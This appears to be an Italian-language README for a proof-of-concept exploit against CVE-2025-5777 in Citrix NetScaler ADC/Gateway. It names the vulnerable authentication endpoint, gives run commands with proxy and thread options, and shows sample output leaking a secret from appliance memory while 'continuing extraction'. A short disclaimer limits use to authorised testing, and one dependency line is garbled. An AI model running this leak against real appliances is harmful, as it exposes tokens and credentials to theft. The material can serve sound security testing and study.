
Prova di concetto per la perdita di memoria di Citrix NetScaler
Questo script sfrutta una vulnerabilità critica di divulgazione della memoria nei dispositivi Citrix NetScaler ADC/Gateway, identificata come CVE-2025-5777 (soprannominata CitrixBleed 2). Innesca una perdita di memoria tramite l'endpoint /p/u/doAuthentication.do, rivelando memoria non inizializzata contenente dati sensibili come frammenti XML, token e potenzialmente credenziali.
aiohttpaiohttp, coloramaasyncio + aiohttp<InitialValue>python3 CVE-2025-5777.py http://<target> [options]
| Opzione | Descrizione |
|---|---|
-v, --verbose | Abilita l'output di debug verboso |
-p <proxy> | Usa un proxy HTTP (es. http://127.0.0.1:8080) |
-t <threads> | Numero di richieste concorrenti (predefinito: 10) |
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
_____________ _______________ _______________ ________ .________ .___________________________________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \ | ____/ | ____/\______ \______ \______ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ |____ \ ______ |____ \ / / / / / /
\ \____\ / | \ /_____/ / \ \_/ \/ \ / \ /_____/ / \ / / / / / /
\______ / \___/ /_______ / \_______ \_____ /\_______ \/______ / /______ / /____/ /____/ /____/
\/ \/ \/ \/ \/ \/ \/
Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
Author: 0xgh057r3c0n
[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21 secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74 @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e ialValue>
------------------------------------------------------------------------
[✔️ ] Leak confirmed. Continuing extraction...
Questa prova di concetto è destinata esclusivamente a test di sicurezza autorizzati e a fini educativi. La scansione o lo sfruttamento non autorizzato di sistemi che non possiedi è illegale.